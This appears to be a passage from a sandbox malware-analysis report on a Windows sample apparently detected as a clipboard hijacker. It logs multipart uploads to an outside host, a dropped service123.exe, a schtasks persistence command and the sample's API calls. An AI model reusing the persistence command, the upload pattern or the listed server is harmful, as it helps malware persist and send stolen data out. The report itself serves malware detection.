Sep 29, 2024 00:53:27.885701895 CEST	34608	OUT	Data Raw: 28 af 79 99 64 b7 f1 7f 1b 60 38 72 2a 3b 1e 94 17 72 fb 7b 71 c3 23 ce c0 a7 d1 04 11 4c 8e 76 f0 52 9b 36 74 d6 8b 69 33 59 38 42 48 bd 51 0a 2f 15 e3 d2 8c 7d 2f f8 82 ca 83 21 62 f4 36 cb 87 30 01 9b e9 33 9e 6e 1f e4 11 43 c7 3f c2 51 27 fc Data Ascii: (yd`8r;r{q#LvR6ti3Y8BHQ/}/!b603nC?Q'D9@h7nA`A/?es[vf)SuPRC#(vRP8p#Degs9p\/6:>^xE*r
Sep 29, 2024 00:53:27.937475920 CEST	1236	OUT	Data Raw: 01 80 fd 4a 96 be b1 7b bc 34 ca 1d 73 a6 73 6c 7e 18 bb a2 81 16 20 6f 48 7d 2e a7 0f c3 7f 2c a4 dd c8 26 eb ce e3 a7 a2 f0 89 be 20 8e 5d 95 12 23 c9 00 a1 d2 99 98 d0 21 45 fb f0 ef 79 c5 1c 50 61 54 db 76 a2 c1 8a b4 a2 7e 60 93 90 2f 29 44 Data Ascii: J{4ssl~ oH}.,& ]#!EyPaTv~`/)D#K9"e#DHUT&^.s!X`_#F{3a&F$>Ain#">qD-_Nr,fqL[p>xTl'{6OV3d@b3V}
Sep 29, 2024 00:53:28.758789062 CEST	209	IN	HTTP/1.1 200 OK Server: nginx/1.24.0 (Ubuntu) Date: Sat, 28 Sep 2024 22:53:28 GMT Content-Type: text/plain; charset=utf-8 Content-Length: 2 Connection: close ETag: W/"2-nOO9QiTIwXgNtWtBJezz8kv3SLc" Data Raw: 4f 4b Data Ascii: OK

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.5	49730	84.38.182.221	80	2228	C:\Users\user\Desktop\file.exe

Timestamp	Bytes transferred	Direction	Data
Sep 29, 2024 00:53:31.985862970 CEST	334	OUT	POST /v1/upload.php HTTP/1.1 Cache-Control: no-cache Connection: Keep-Alive Pragma: no-cache Content-Type: multipart/form-data; boundary=----Boundary48429912 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36 Content-Length: 30023 Host: fivevh5pt.top
Sep 29, 2024 00:53:31.985862970 CEST	11124	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 42 6f 75 6e 64 61 72 79 34 38 34 32 39 39 31 32 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 57 65 73 Data Ascii: ------Boundary48429912Content-Disposition: form-data; name="file"; filename="Wesasas.bin"Content-Type: application/octet-stream>XZ$:56TTGnV./[:uIbA\|eu\|GmIq[\|QQ0"`O]@"T Ws<L
Sep 29, 2024 00:53:31.992230892 CEST	8652	OUT	Data Raw: c4 52 28 d7 e3 04 9e e2 ca 06 07 0b 5a f2 d3 35 c2 d9 cb 63 db 6e 5f aa da b1 f2 dd 59 2f ca ac 1c f0 0f ac cc 51 b2 02 7d 2d 9d e7 58 0a 54 11 5d 9f 4e f5 83 be d6 f5 a8 63 7b 92 d5 d4 66 60 2f 77 e8 b4 56 47 1e e8 a6 c2 cc 98 2d 63 88 53 1f f3 Data Ascii: R(Z5cn_Y/Q}-XT]Nc{f`/wVG-cS<3\|m@\|"\pB6[BU VIE5o%]]\=BEs=\R$kE ANd3b}Vcqq{I
Sep 29, 2024 00:53:31.993947983 CEST	9888	OUT	Data Raw: 4b b7 29 fe ca f5 e0 be 0f 91 cc 3c d5 35 ba 7d c0 a3 6f 08 72 1f c1 73 0a 9e a1 c8 c4 44 82 fd fc f2 2a 96 ff d8 89 f7 80 1c ea f6 ee eb dd 9e cf 2e e7 5c a7 5b 25 f7 d2 7a 6c e6 32 87 67 bb 39 8e 2f 16 49 cc 61 2e 91 e3 cc 99 b4 7a a3 46 e4 55 Data Ascii: K)<5}orsD*.\[%zl2g9/Ia.zFUtVyPZ&MP/>GammY'eLFbR-^lhCi0.UcjCTWX=@0}X8]x%x<\|L)k{(kA+
Sep 29, 2024 00:53:31.998567104 CEST	359	OUT	Data Raw: 80 31 09 9b 21 e4 93 60 80 a8 c6 61 6e e7 56 33 72 38 04 89 f6 a9 90 05 1d 01 3d 74 19 45 fe 33 7f 81 ed 88 21 1b 8d e4 1e 50 df d5 b5 3d 5c ca 5c 84 8d fb 3d 33 a1 f1 fe fe 0c ef 91 cd 8c 2a e9 9f a7 b1 94 84 e5 6c a3 b1 14 d8 b1 93 71 c6 ae 33 Data Ascii: 1!`anV3r8=tE3!P=\\=3*lq3TaVM93FMyRgIaIqDD]l"hwQPoIg?/XJm+u\xy@l4+mpip]'XKZwHC
Sep 29, 2024 00:53:32.028407097 CEST	1236	OUT	Data Raw: 5b 09 22 d2 bf 5a f4 36 52 ac 22 66 15 7c a6 17 5f 12 36 e9 7b d8 3b 9a d8 a9 b6 2e e7 d6 14 a5 d6 17 e2 fb 59 61 67 bd e2 63 2c d9 89 cb 1e 14 f7 62 4d 46 e2 b1 47 2d 9e b0 a6 a2 ae 08 41 e1 7e 3b 54 6e af 5b 9d 6c 9f 8b da 92 58 69 40 3f d8 85 Data Ascii: ["Z6R"f\|_6{;.Yagc,bMFG-A~;Tn[lXi@?=E)c,Att4ic,K5fH"$/PY2\|8~x$\01LUM5^<fdzv{$e<Bl\|>tW`Y<l.__=<j`8i^v@
Sep 29, 2024 00:53:32.795248985 CEST	209	IN	HTTP/1.1 200 OK Server: nginx/1.24.0 (Ubuntu) Date: Sat, 28 Sep 2024 22:53:32 GMT Content-Type: text/plain; charset=utf-8 Content-Length: 2 Connection: close ETag: W/"2-nOO9QiTIwXgNtWtBJezz8kv3SLc" Data Raw: 4f 4b Data Ascii: OK

Target ID:	0
Start time:	18:53:13
Start date:	28/09/2024
Path:	C:\Users\user\Desktop\file.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\file.exe"
Imagebase:	0xf00000
File size:	9'969'664 bytes
MD5 hash:	18E1D0F8B01CEAE85D5D7136C4CF751A
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Clipboard_Hijacker_5, Description: Yara detected Clipboard Hijacker, Source: 00000000.00000003.2778604141.00000000049F0000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	4
Start time:	18:54:15
Start date:	28/09/2024
Path:	C:\Users\user\AppData\Local\Temp\service123.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Local\Temp\service123.exe"
Imagebase:	0xcb0000
File size:	314'617'856 bytes
MD5 hash:	F48DE3A26F00253050481FA7F5CD3EC3
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low
Has exited:	false

Show Windows behavior

Target ID:	5
Start time:	18:54:15
Start date:	28/09/2024
Path:	C:\Windows\SysWOW64\schtasks.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\System32\schtasks.exe" /create /tn "ServiceData4" /tr "C:\Users\user\AppData\Local\Temp\/service123.exe" /st 00:01 /du 9800:59 /sc once /ri 1 /f
Imagebase:	0x2a0000
File size:	187'904 bytes
MD5 hash:	48C2FE20575769DE916F48EF0676A965
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	6
Start time:	18:54:15
Start date:	28/09/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6d64d0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	7
Start time:	18:54:18
Start date:	28/09/2024
Path:	C:\Users\user\AppData\Local\Temp\service123.exe
Wow64 process (32bit):	true
Commandline:	C:\Users\user\AppData\Local\Temp\/service123.exe
Imagebase:	0xcb0000
File size:	314'617'856 bytes
MD5 hash:	F48DE3A26F00253050481FA7F5CD3EC3
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	8
Start time:	18:55:02
Start date:	28/09/2024
Path:	C:\Users\user\AppData\Local\Temp\service123.exe
Wow64 process (32bit):	true
Commandline:	C:\Users\user\AppData\Local\Temp\/service123.exe
Imagebase:	0xcb0000
File size:	314'617'856 bytes
MD5 hash:	F48DE3A26F00253050481FA7F5CD3EC3
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	low
Has exited:	true

Show Windows behavior

Execution Graph

Execution Coverage:	0.1%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	61.1%
Total number of Nodes:	72
Total number of Limit Nodes:	3

Executed Functions

Function 6C3814B0 Relevance: 21.1, APIs: 8, Strings: 4, Instructions: 121
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

_open.MSVCRT ref: 6C3814CD
_exit.MSVCRT ref: 6C38151A
_write.MSVCRT ref: 6C38156A
_close.MSVCRT ref: 6C381579

Strings

,pJl, xrefs: 6C454AED
CONOUT$, xrefs: 6C3814C6
terminated, xrefs: 6C381540
@, xrefs: 6C454AB1

Memory Dump Source

Source File: 00000004.00000002.3425541336.000000006C381000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C380000, based on PE: true

Associated: 00000004.00000002.3425492148.000000006C380000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3425640639.000000006C45D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3425681617.000000006C45F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3425743931.000000006C4A8000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3425759102.000000006C4A9000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3425777113.000000006C4AC000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6c380000_service123.jbxd

Similarity

API ID: _close_exit_open_write
String ID: terminated$,pJl$@$CONOUT$
API String ID: 28676597-3084818534
Opcode ID: 0448089b773512d53bcd59375afe3c54a1a4b516460ddc972d5dac61c8a1e4fa
Instruction ID: 81d4fa14e32331d02984e59e4f2c5cafff90e090d5e49f907d2ef1474d420118
Opcode Fuzzy Hash: 0448089b773512d53bcd59375afe3c54a1a4b516460ddc972d5dac61c8a1e4fa
Instruction Fuzzy Hash: F04167B19093018FDB00EFB9C444A5EBBF4AB49358F408A2DE8A9DB784E335C815CF56

Function 00CB116C Relevance: 19.7, APIs: 13, Instructions: 200
sleepstringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Sleep.KERNEL32 ref: 00CB11B7
SetUnhandledExceptionFilter.KERNEL32 ref: 00CB1238
__p__acmdln.MSVCRT ref: 00CB1261
malloc.MSVCRT ref: 00CB12EB
strlen.MSVCRT ref: 00CB1323
malloc.MSVCRT ref: 00CB132E
memcpy.MSVCRT ref: 00CB1344
GetStartupInfoA.KERNEL32 ref: 00CB1433

Memory Dump Source

Source File: 00000004.00000002.3425240690.0000000000CB1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00CB0000, based on PE: true

Associated: 00000004.00000002.3425216186.0000000000CB0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.3425256766.0000000000CBA000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.3425298629.0000000000CBE000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.3425318378.0000000000CC1000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_cb0000_service123.jbxd

Similarity

API ID: malloc$ExceptionFilterInfoSleepStartupUnhandled__p__acmdlnmemcpystrlen
String ID:
API String ID: 1672962128-0
Opcode ID: 83e746feab1a7ec5aac8ae1a9e31c3f4167cc68341a3493db3b82dd07520f4d9
Instruction ID: 4adbeee4014d8eb17f27374d8d977ba578503feccec8641c0347cbdaa7cb5356
Opcode Fuzzy Hash: 83e746feab1a7ec5aac8ae1a9e31c3f4167cc68341a3493db3b82dd07520f4d9
Instruction Fuzzy Hash: 5081AEB19043058FDB10EFA8E8A43EE7BE4FB44344F58462CDD969B311E7359949DB82

Function 00CB15B0 Relevance: 19.4, APIs: 8, Strings: 3, Instructions: 121
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

_open.MSVCRT ref: 00CB15CD
_exit.MSVCRT ref: 00CB161A
_write.MSVCRT ref: 00CB166A
_close.MSVCRT ref: 00CB1679

Strings

CONOUT$, xrefs: 00CB15C6
@, xrefs: 00CB8341
terminated, xrefs: 00CB1640

Memory Dump Source

Source File: 00000004.00000002.3425240690.0000000000CB1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00CB0000, based on PE: true

Associated: 00000004.00000002.3425216186.0000000000CB0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.3425256766.0000000000CBA000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.3425298629.0000000000CBE000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.3425318378.0000000000CC1000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_cb0000_service123.jbxd

Similarity

API ID: _close_exit_open_write
String ID: terminated$@$CONOUT$
API String ID: 28676597-491099378
Opcode ID: 87eed1665b737d83dbd718f5f1c05b946b2bf2e7564db1409688634bcd66a02d
Instruction ID: 46003467ce59eb443918bc5ec825803e8b1646a6b29c71d76051dd75220be7dd
Opcode Fuzzy Hash: 87eed1665b737d83dbd718f5f1c05b946b2bf2e7564db1409688634bcd66a02d
Instruction Fuzzy Hash: 4A417CB09083059FCB00EF79D8447AEBBF8EB84754F448A2DE8A5D7250E734C949CB52

Function 00CB81E0 Relevance: 14.1, APIs: 5, Strings: 3, Instructions: 116
libraryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LoadLibraryA.KERNELBASE(?,?,?,?,?,?,?,00CB138E,?,?,00006EA2,00CB138E), ref: 00CB8271
GetProcAddress.KERNEL32 ref: 00CB828B
FreeLibrary.KERNEL32(?,?,?,?,?,?,?,?,?,?,00CB138E,?,?,00006EA2,00CB138E), ref: 00CB829D

Strings

IZImiIFXXrvtVOHFrvtVOHFozZW.dll, xrefs: 00CB824A
Failed to get function address. Error code: %d, xrefs: 00CB82E0
dNlJCHWBGOHvckcJnJak, xrefs: 00CB827E

Memory Dump Source

Source File: 00000004.00000002.3425240690.0000000000CB1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00CB0000, based on PE: true

Associated: 00000004.00000002.3425216186.0000000000CB0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.3425256766.0000000000CBA000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.3425298629.0000000000CBE000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.3425318378.0000000000CC1000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_cb0000_service123.jbxd

Similarity

API ID: Library$AddressFreeLoadProc
String ID: Failed to get function address. Error code: %d$IZImiIFXXrvtVOHFrvtVOHFozZW.dll$dNlJCHWBGOHvckcJnJak
API String ID: 145871493-638960891
Opcode ID: b64ec75b703b80a403a3c45f76a75b78811f815d410cecf9d2d2e02baf1283d8
Instruction ID: 1098ca20560ec7de495a9ff634009dce735fc32a10fbde4e4df4123740c2b0ca
Opcode Fuzzy Hash: b64ec75b703b80a403a3c45f76a75b78811f815d410cecf9d2d2e02baf1283d8
Instruction Fuzzy Hash: 4831B6B19096019FDB00BF78ED456DEBBF8FB49700F104A28E99683211EB75D545CB53

Function 00CB8230 Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 62
libraryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LoadLibraryA.KERNELBASE(?,?,?,?,?,?,?,00CB138E,?,?,00006EA2,00CB138E), ref: 00CB8271
GetProcAddress.KERNEL32 ref: 00CB828B
FreeLibrary.KERNEL32(?,?,?,?,?,?,?,?,?,?,00CB138E,?,?,00006EA2,00CB138E), ref: 00CB829D
GetLastError.KERNEL32(?,?,?,?,?,?,?,?,00CB138E,?,?,00006EA2,00CB138E), ref: 00CB82BD
GetLastError.KERNEL32 ref: 00CB82DA
FreeLibrary.KERNEL32 ref: 00CB82F3

Strings

IZImiIFXXrvtVOHFrvtVOHFozZW.dll, xrefs: 00CB824A
dNlJCHWBGOHvckcJnJak, xrefs: 00CB827E
Failed to load DLL. Error code: %d, xrefs: 00CB82C3

Memory Dump Source

Source File: 00000004.00000002.3425240690.0000000000CB1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00CB0000, based on PE: true

Associated: 00000004.00000002.3425216186.0000000000CB0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.3425256766.0000000000CBA000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.3425298629.0000000000CBE000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.3425318378.0000000000CC1000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_cb0000_service123.jbxd

Similarity

API ID: Library$ErrorFreeLast$AddressLoadProc
String ID: Failed to load DLL. Error code: %d$IZImiIFXXrvtVOHFrvtVOHFozZW.dll$dNlJCHWBGOHvckcJnJak
API String ID: 1397630947-1351541028
Opcode ID: 4f37ee45c4ef25372d4c538ad4eb10f96dbe30bbf2846c697264b1bd97e3d3db
Instruction ID: e70fb3d53a682997df45a7f3161f4c8b0715e2337388fdadac3cf91a6c65c682
Opcode Fuzzy Hash: 4f37ee45c4ef25372d4c538ad4eb10f96dbe30bbf2846c697264b1bd97e3d3db
Instruction Fuzzy Hash: 8B11C8B29056009FDB00BFB8ED456DE7BB5EB45700F108628D86683141FF75D505DB83

Function 00CB13C9 Relevance: 12.1, APIs: 8, Instructions: 109
stringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

SetUnhandledExceptionFilter.KERNEL32 ref: 00CB1238
__p__acmdln.MSVCRT ref: 00CB1261
malloc.MSVCRT ref: 00CB12EB
strlen.MSVCRT ref: 00CB1323
malloc.MSVCRT ref: 00CB132E
memcpy.MSVCRT ref: 00CB1344
_amsg_exit.MSVCRT ref: 00CB13EA
_initterm.MSVCRT ref: 00CB140C

Memory Dump Source

Source File: 00000004.00000002.3425240690.0000000000CB1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00CB0000, based on PE: true

Associated: 00000004.00000002.3425216186.0000000000CB0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.3425256766.0000000000CBA000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.3425298629.0000000000CBE000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.3425318378.0000000000CC1000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_cb0000_service123.jbxd

Similarity

API ID: malloc$ExceptionFilterUnhandled__p__acmdln_amsg_exit_inittermmemcpystrlen
String ID:
API String ID: 2053141405-0
Opcode ID: f23d40d8524af55050f8e158b20e02bd943e6ad08ce49dbf28a9ead9eb72adca
Instruction ID: 749d47f5c39d152eeca1e2004b7ec61357c45405786fbfd070b81625a44b47be
Opcode Fuzzy Hash: f23d40d8524af55050f8e158b20e02bd943e6ad08ce49dbf28a9ead9eb72adca
Instruction Fuzzy Hash: 454109B49083058FDB10FF68E8A439EBBF4BB44340F54462DE99697321EB74994ADF42

Function 00CB11A3 Relevance: 10.6, APIs: 7, Instructions: 115
sleepstringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Sleep.KERNEL32 ref: 00CB11B7
SetUnhandledExceptionFilter.KERNEL32 ref: 00CB1238
__p__acmdln.MSVCRT ref: 00CB1261
malloc.MSVCRT ref: 00CB12EB
strlen.MSVCRT ref: 00CB1323
malloc.MSVCRT ref: 00CB132E
memcpy.MSVCRT ref: 00CB1344
_amsg_exit.MSVCRT ref: 00CB13EA
_initterm.MSVCRT ref: 00CB140C

Memory Dump Source

Source File: 00000004.00000002.3425240690.0000000000CB1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00CB0000, based on PE: true

Associated: 00000004.00000002.3425216186.0000000000CB0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.3425256766.0000000000CBA000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.3425298629.0000000000CBE000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.3425318378.0000000000CC1000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_cb0000_service123.jbxd

Similarity

API ID: malloc$ExceptionFilterSleepUnhandled__p__acmdln_amsg_exit_inittermmemcpystrlen
String ID:
API String ID: 2230096795-0
Opcode ID: 6ab162a4b34864cf9ebe067e89375d46530279ab521314357ada306eb550149a
Instruction ID: 087cb208ca512383ebb36cff5aa05c68e024c5d11e700759a49e07dc011a04b2
Opcode Fuzzy Hash: 6ab162a4b34864cf9ebe067e89375d46530279ab521314357ada306eb550149a
Instruction Fuzzy Hash: D4414EB4A043058FDB10EF68E8A439EBBF0BB44344F54462DDD9697310EB709945CF92

Function 00CB1160 Relevance: 9.1, APIs: 6, Instructions: 131
sleepstringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Sleep.KERNEL32 ref: 00CB11B7
SetUnhandledExceptionFilter.KERNEL32 ref: 00CB1238
__p__acmdln.MSVCRT ref: 00CB1261
malloc.MSVCRT ref: 00CB12EB
strlen.MSVCRT ref: 00CB1323
malloc.MSVCRT ref: 00CB132E
memcpy.MSVCRT ref: 00CB1344
GetStartupInfoA.KERNEL32 ref: 00CB1433

Memory Dump Source

Source File: 00000004.00000002.3425240690.0000000000CB1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00CB0000, based on PE: true

Associated: 00000004.00000002.3425216186.0000000000CB0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.3425256766.0000000000CBA000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.3425298629.0000000000CBE000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.3425318378.0000000000CC1000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_cb0000_service123.jbxd

Similarity

API ID: malloc$ExceptionFilterInfoSleepStartupUnhandled__p__acmdlnmemcpystrlen
String ID:
API String ID: 1672962128-0
Opcode ID: b98e1298a28d40faad11ea798dfccac8d502831522be9c04a46477edfa6788b8
Instruction ID: c63b82886624c320c07fa054b14b91638a42a9ab08d28c938aa7119e6c137b1a
Opcode Fuzzy Hash: b98e1298a28d40faad11ea798dfccac8d502831522be9c04a46477edfa6788b8
Instruction Fuzzy Hash: 98513CB59043018FDB10EF68E8A479EBBF4FB48344F54462CE9569B321E7309945DF91

Function 6C454230 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 32
sleepsynchronizationclipboardCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

OpenMutexA.KERNEL32 ref: 6C454259
CreateMutexA.KERNELBASE ref: 6C4542A3
Sleep.KERNELBASE ref: 6C4542BF
GetClipboardSequenceNumber.USER32 ref: 6C4542C8

Strings

NlVquRWTOzXSpoxOdrYz, xrefs: 6C454242, 6C45428C

Memory Dump Source

Source File: 00000004.00000002.3425541336.000000006C381000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C380000, based on PE: true

Associated: 00000004.00000002.3425492148.000000006C380000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3425640639.000000006C45D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3425681617.000000006C45F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3425743931.000000006C4A8000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3425759102.000000006C4A9000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3425777113.000000006C4AC000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6c380000_service123.jbxd

Similarity

API ID: Mutex$ClipboardCreateNumberOpenSequenceSleep
String ID: NlVquRWTOzXSpoxOdrYz
API String ID: 3689039344-2995240568
Opcode ID: b748e5b8cdaf94f93f880343fe4c134a3199bf141a5ebdcc56808d8f8879355d
Instruction ID: 00c9470dbf7458290682380af6b12f35196a6eacab4730e09fa0d70fd34db4d9
Opcode Fuzzy Hash: b748e5b8cdaf94f93f880343fe4c134a3199bf141a5ebdcc56808d8f8879355d
Instruction Fuzzy Hash: DC01D2715093068FDB00FFA8D549B5FBFF4AB86384F418818E98897648E776A059CB93

Function 00CB1296 Relevance: 5.1, APIs: 4, Instructions: 80
stringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

malloc.MSVCRT ref: 00CB12EB
strlen.MSVCRT ref: 00CB1323
malloc.MSVCRT ref: 00CB132E
memcpy.MSVCRT ref: 00CB1344

Memory Dump Source

Source File: 00000004.00000002.3425240690.0000000000CB1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00CB0000, based on PE: true

Associated: 00000004.00000002.3425216186.0000000000CB0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.3425256766.0000000000CBA000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.3425298629.0000000000CBE000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.3425318378.0000000000CC1000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_cb0000_service123.jbxd

Similarity

API ID: malloc$memcpystrlen
String ID:
API String ID: 3553820921-0
Opcode ID: ce74046c20679ae913d5dff77cc1f734ef2b7dea6a9fc95aa85ba5f51d1686f2
Instruction ID: ecc91c2509d487de0bc2fca87d8335bf2129c305ca1b6259f36e2224ba032ad6
Opcode Fuzzy Hash: ce74046c20679ae913d5dff77cc1f734ef2b7dea6a9fc95aa85ba5f51d1686f2
Instruction Fuzzy Hash: 363107B59047158FCB10EF64E89039EBBF1FB48300F55862DD95A97311E735AA0ADF81

Function 00CB13BB Relevance: 5.1, APIs: 4, Instructions: 66
stringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

malloc.MSVCRT ref: 00CB12EB
strlen.MSVCRT ref: 00CB1323
malloc.MSVCRT ref: 00CB132E
memcpy.MSVCRT ref: 00CB1344

Memory Dump Source

Source File: 00000004.00000002.3425240690.0000000000CB1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00CB0000, based on PE: true

Associated: 00000004.00000002.3425216186.0000000000CB0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.3425256766.0000000000CBA000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.3425298629.0000000000CBE000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.3425318378.0000000000CC1000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_cb0000_service123.jbxd

Similarity

API ID: malloc$memcpystrlen
String ID:
API String ID: 3553820921-0
Opcode ID: 7ec536e0bc485a6acc9396c3ce97da4f19e101882366615a5105a6f1be24715e
Instruction ID: 3e381cb237cd9c36e24a343a345ef7bc27df93faaeb1001ea0875891ddbc6f31
Opcode Fuzzy Hash: 7ec536e0bc485a6acc9396c3ce97da4f19e101882366615a5105a6f1be24715e
Instruction Fuzzy Hash: 0321D5B59057158FCB14EF65E89079DBBF1FB48300F15862DD946A7311E730A906DF81

Function 6C39B1A0 Relevance: 1.4, APIs: 1, Instructions: 144
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000004.00000002.3425541336.000000006C381000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C380000, based on PE: true

Associated: 00000004.00000002.3425492148.000000006C380000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3425640639.000000006C45D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3425681617.000000006C45F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3425743931.000000006C4A8000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3425759102.000000006C4A9000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3425777113.000000006C4AC000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6c380000_service123.jbxd

Similarity

API ID:
String ID:
API String ID:
